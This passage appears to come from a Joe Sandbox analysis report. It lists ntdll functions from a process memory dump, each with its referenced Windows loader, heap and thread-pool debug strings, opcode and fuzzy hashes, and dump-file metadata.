                                          • Instruction ID: 0b8700817439ac6760aabba4307a44206efb7abeee3e3bcdb2969a1b6a421375
                                          • Opcode Fuzzy Hash: eab92986a2c32df85dc34f1cbb9301db2427080528bab09476ec1ca9ff9adb15
                                          • Instruction Fuzzy Hash: 6A41E5B5560300AFDB20DB24CC49B5B77E9EF44768F00592AF858EB660DB38D811DB97
                                          Function 377743D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37774508
                                          • LdrpCheckRedirection, xrefs: 3777450F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 37774519
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 3446177414-3154609507
                                          • Opcode ID: bc3be4cc7b3db81c5f86daadf09e99346b1831468f6e37e74e39bc1a317aefc4
                                          • Instruction ID: cc7d9bf6c8449dd239ca48d272bbdea671246ee76c6182ef2892eea7b215e919
                                          • Opcode Fuzzy Hash: bc3be4cc7b3db81c5f86daadf09e99346b1831468f6e37e74e39bc1a317aefc4
                                          • Instruction Fuzzy Hash: 6041B2766043919FDF20CF58C845A36B7E6EF486A0F050AA9ECD8EF255D730E810DB91
                                          Function 377CACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: a6e9a8873e2c88e46bc23808e636f0107a47fcca45c7613fd5d2de787421ae8d
                                          • Instruction ID: ad09473b9df15f83af15d894ade3494403bf5cf1b29248e7d17d67d8c4e8c71f
                                          • Opcode Fuzzy Hash: a6e9a8873e2c88e46bc23808e636f0107a47fcca45c7613fd5d2de787421ae8d
                                          • Instruction Fuzzy Hash: 2BF1F572E006128BDB08CF68C8E567DBBF6AF8C311B1A456ED456DF394D634EA41CB90
                                          Function 376E7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          • Opcode ID: 056925bd4c0001cdd16de5b0017a83890a5b9081f15a0db16f3508cfd39dbe61
                                          • Instruction ID: 1d7b4e85e226d54b116e4b8545dee1c7227029a548c2e66464fda6ebf0b85c31
                                          • Opcode Fuzzy Hash: 056925bd4c0001cdd16de5b0017a83890a5b9081f15a0db16f3508cfd39dbe61
                                          • Instruction Fuzzy Hash: 62019C76017241AEE304C728D93AF52779CEB42B30F2A089EF0044FD91CA5CAC54DE76
                                          Function 376F0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • kLsE, xrefs: 376F05FE
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 376F0586
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 3446177414-2547482624
                                          • Opcode ID: 2c867b87debd9e324c6195c88116ade33bef85501d4528c720bc2a6dea08655f
                                          • Instruction ID: 8b9e851550eed30bc174395b7accb924c65f42ec34c679f440dce240d7d628b5
                                          • Opcode Fuzzy Hash: 2c867b87debd9e324c6195c88116ade33bef85501d4528c720bc2a6dea08655f
                                          • Instruction Fuzzy Hash: 5F51D3B5A10B0ADFEB10DFB4C5607AAB7F4AF44310F00883ED595D7240EBB6A505CBA2
                                          Function 37770443 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 8L$8L(
                                          • API String ID: 3446177414-2435122696
                                          • Opcode ID: 77e44c485063f203a5a25c16819316938c18e3745b9be02cfeee128e55bbdd91
                                          • Instruction ID: d0942c3f7626d4434c11b521d067d91fce8aa8332fac4dd8d2db4a4afde9e630
                                          • Opcode Fuzzy Hash: 77e44c485063f203a5a25c16819316938c18e3745b9be02cfeee128e55bbdd91
                                          • Instruction Fuzzy Hash: BD418EB16143459FE760CF24C845BABBBE8FF88360F004A2AF598DB250E774D915CB92
                                          Function 376FB5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LUl7$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                          • API String ID: 0-1247534402
                                          • Opcode ID: 0a9b935b3fce07b8bc69e6789ae2f5836f6db73f0fd33018678b834baf816f23
                                          • Instruction ID: 4c3b85ce90dab4c5fcfac0b88b868ad3478a1a3a9e8503bd15051fd4fd95e21e
                                          • Opcode Fuzzy Hash: 0a9b935b3fce07b8bc69e6789ae2f5836f6db73f0fd33018678b834baf816f23
                                          • Instruction Fuzzy Hash: F5B15975A00705CBDB14CF68C8A0BADB7B6EF48768F21492DE465EB7A0DB35A840CF11
                                          Function 376FA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: ec7e6ef0ec3b53ac5f88265009ef73ed72eb1fbcd727507fe9cf19dfe285ad6b
                                          • Instruction ID: 20e8c4e0f6b144e0978284f63300caad34048a1982431c85e7cdf62e35092f8c
                                          • Opcode Fuzzy Hash: ec7e6ef0ec3b53ac5f88265009ef73ed72eb1fbcd727507fe9cf19dfe285ad6b
                                          • Instruction Fuzzy Hash: C8C19FB5108382CFE311CF14C990B6AB7E5BF8AB64F008969F895DB250EB35D949CB53
                                          Function 37728322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 377284B1
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3772847E
                                          • LdrpInitializeProcess, xrefs: 37728342
                                          • minkernel\ntdll\ldrinit.c, xrefs: 37728341
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 9dc25466cc1b89d3b092439070f216363348975292fac8d568812c682b474284
                                          • Instruction ID: ae95f41ee988023bb827072db8d090d4d90bb06d2463e6e00d8ade85a8d7ec4f
                                          • Opcode Fuzzy Hash: 9dc25466cc1b89d3b092439070f216363348975292fac8d568812c682b474284
                                          • Instruction Fuzzy Hash: C591BE71509341AFE721CE20C844FABBBECEB88794F40092EFA949A151E739D914EB53
                                          Function 3772265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() passed the empty activation context, xrefs: 37761FE8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 377620C0
                                          • .Local, xrefs: 377227F8
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 37761FE3, 377620BB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 904fa2995ec53d11286d83a8538fdb4beacaada50624bfaac636308cc9179adf
                                          • Instruction ID: f988abb085f57f606dea81d00d6e3ea2290d5c5d0934773b5a9cfa49d0f1f310
                                          • Opcode Fuzzy Hash: 904fa2995ec53d11286d83a8538fdb4beacaada50624bfaac636308cc9179adf
                                          • Instruction Fuzzy Hash: 35A1AF7590032D9FDB20DF64C888BA9B3B1BF58364F5105EAD818AB255DB34EE81CF91
                                          Function 3778327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}m7
                                          • API String ID: 0-3235662035
                                          • Opcode ID: 79f1c847f37230927379696f04b20ab5bf271bf589adfb3131129f9ecebc3824
                                          • Instruction ID: 21e7367965116ebd57caf36cbb42a592cf92eb8674449c5a5ca30f15eff6d6c4
                                          • Opcode Fuzzy Hash: 79f1c847f37230927379696f04b20ab5bf271bf589adfb3131129f9ecebc3824
                                          • Instruction Fuzzy Hash: 6B818E75609340AFE711CB28C845B6EBBE9FF89760F44092DF9989F290DB74E900CB52
                                          Function 376FB360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LUl7$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                          • API String ID: 0-3004382854
                                          • Opcode ID: 30d33a4d7b4ee198fd4e568f40faf11a31cb57f36d153e64f98caf08009a2606
                                          • Instruction ID: 534126291a3e38b6e883ef0b0f3005482706ad49e687e9e812c5a7ec46b0c0c7
                                          • Opcode Fuzzy Hash: 30d33a4d7b4ee198fd4e568f40faf11a31cb57f36d153e64f98caf08009a2606
                                          • Instruction Fuzzy Hash: B691DF75A04349CBEB11CF64C4607AEB7B1FF04368F244599E818AB390D779AE44CF91
                                          Function 376F63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 37750EB5
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 37750E2F
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 37750E72
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 37750DEC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: 85981594b81cb5f08b5c7d8e079fed64ed39dcd342996aba3515136c8140b344
                                          • Instruction ID: 6962cf6993dce0dd1a98628caa41c4c10c9a00ef586f7aee145f291f6af94c70
                                          • Opcode Fuzzy Hash: 85981594b81cb5f08b5c7d8e079fed64ed39dcd342996aba3515136c8140b344
                                          • Instruction Fuzzy Hash: 2271D3B19043499FDB50EF20C889F9B7BA9EF857A4F404869F8488B146D739D588CBD2
                                          Function 376EF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          • Opcode ID: b102966a1520afccfed8509afe197b20c4747053d79ddcc835c8e93ef0132e55
                                          • Instruction ID: 96c202b6bd6c440270b562000c84fffe9a6d671dccf9e3df8e678ef1f1f78bef
                                          • Opcode Fuzzy Hash: b102966a1520afccfed8509afe197b20c4747053d79ddcc835c8e93ef0132e55
                                          • Instruction Fuzzy Hash: 076113752057809FE311CB64C958F67B7EDEF847A0F040899F9549F691DB78E800CB62
                                          Function 3777166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                          • API String ID: 0-1880532218
                                          • Opcode ID: a819537ad7b42ece7bc647f944a618997a36936a146adde61cc74606ca79c2c8
                                          • Instruction ID: 282427c451627250f3eff564ec185056ea075a3847dcf7f707dffeabeee57ae2
                                          • Opcode Fuzzy Hash: a819537ad7b42ece7bc647f944a618997a36936a146adde61cc74606ca79c2c8
                                          • Instruction Fuzzy Hash: F4217B76A452409BDB05CB18DC41BAAB3F6AF84754F054169E805EF342EB74ED05CB81
                                          Function 37783608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                          • API String ID: 0-1168191160
                                          • Opcode ID: 53002a6a86dc6f40b75c0cc3108169ad2877c31abbdcfc160fd19686028d80fc
                                          • Instruction ID: 98b0fede41751ab6b20efb4c2453bc50e94bd58d824996eb5b52633ded6101f8
                                          • Opcode Fuzzy Hash: 53002a6a86dc6f40b75c0cc3108169ad2877c31abbdcfc160fd19686028d80fc
                                          • Instruction Fuzzy Hash: 1FF181B5A003289BDB20CF18CC91BADB3B6EF48754F4444E9E90DAB241E7359E85CF59
                                          Function 376F1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 376F1648
                                          • HEAP: , xrefs: 376F14B6
                                          • HEAP[%wZ]: , xrefs: 376F1632
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 360392c0154df887ff68a842b2bdba432ada564223e71dde02e9d482eeee81c3
                                          • Instruction ID: cc9ee276bc5be1de1451264c4bc2172084572c8283e2b86c94d1f18eeda28bd9
                                          • Opcode Fuzzy Hash: 360392c0154df887ff68a842b2bdba432ada564223e71dde02e9d482eeee81c3
                                          • Instruction Fuzzy Hash: E3E13274A043459FEB18CF28C460BBABBF1EF883A0F14885DE496DB241E735E945CB51
                                          Function 3771F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Re-Waiting, xrefs: 37760128
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 377600F1
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 377600C7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: d6f1c7aee03e724a11f06b9c665a33c749b049022b4795a740a53ebc7e964bb9
                                          • Instruction ID: fe399f156926cb6531cc1422fa3bbe602004bcdf40bc0493f2cc0efc0f711eff
                                          • Opcode Fuzzy Hash: d6f1c7aee03e724a11f06b9c665a33c749b049022b4795a740a53ebc7e964bb9
                                          • Instruction Fuzzy Hash: 3EE1BE74609741DFE711CF28C884B1AB7E1BB84368F100A5DF5A58F2E2DB74E946CB92
                                          Function 3777330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                          • API String ID: 0-2391371766
                                          • Opcode ID: b426ba83334d592e524ad793e4add77de9639e16de4f38a422f5568f34574de6
                                          • Instruction ID: e9e3eb6fc549b19b4eba9a0a96522b7b5a36b3fef63f012a7306232c9319de30
                                          • Opcode Fuzzy Hash: b426ba83334d592e524ad793e4add77de9639e16de4f38a422f5568f34574de6
                                          • Instruction Fuzzy Hash: B0B1BFB1614381AFEB11CF50C885B7BB7E9AF48764F414929FA50DF250DB74E814CB92
                                          Function 376EA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 0e71ce2042c0a7fad5325a73a6292f9cb56e0283cf4b2d85c19c8ebdb73ac38b
                                          • Instruction ID: ab8d7aa8d3dde5a4652733ddb0a9a9c736ebfbe57ef0561695cea2dba88ee86b
                                          • Opcode Fuzzy Hash: 0e71ce2042c0a7fad5325a73a6292f9cb56e0283cf4b2d85c19c8ebdb73ac38b
                                          • Instruction Fuzzy Hash: 91A16E759112299BDB21DF24CC98BEEB7B8EF44710F1005EAE909AB250DB35AE84CF51
                                          Function 377CB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                          Download Yara Rule
                                          Strings
                                          • GlobalizationUserSettings, xrefs: 377CB3B4
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 377CB3AA
                                          • TargetNtPath, xrefs: 377CB3AF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          • Opcode ID: 02b2df9dbd70b8af98bde28a48d4c635a295f167d577e39c21a14354062bd169
                                          • Instruction ID: 309327fdb703ee3445615e4dbf8aaf4db855c3b157c4ec9b93bccc6faf2e4b1d
                                          • Opcode Fuzzy Hash: 02b2df9dbd70b8af98bde28a48d4c635a295f167d577e39c21a14354062bd169
                                          • Instruction Fuzzy Hash: 6B616172D41229ABDB21DB54DC9CB99B7B8FB18710F4101E9F908AB260D774EE84CF90
                                          Function 376EF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3774E455
                                          • HEAP: , xrefs: 3774E442
                                          • HEAP[%wZ]: , xrefs: 3774E435
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 7fd0d8874484bb09d7efa0535bc458412fd5568fb445b94a58244bca513390df
                                          • Instruction ID: cb51a810399c40e726a1ecc735707061ee7e8e437edf3269e65951b375b73254
                                          • Opcode Fuzzy Hash: 7fd0d8874484bb09d7efa0535bc458412fd5568fb445b94a58244bca513390df
                                          • Instruction Fuzzy Hash: D8511635611784EFE712CBA8C968F9ABBFDFF04760F0444A4E5409BA92D778E904CB61
                                          Function 37711514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpCompleteMapModule, xrefs: 3775A39D
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3775A396
                                          • minkernel\ntdll\ldrmap.c, xrefs: 3775A3A7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
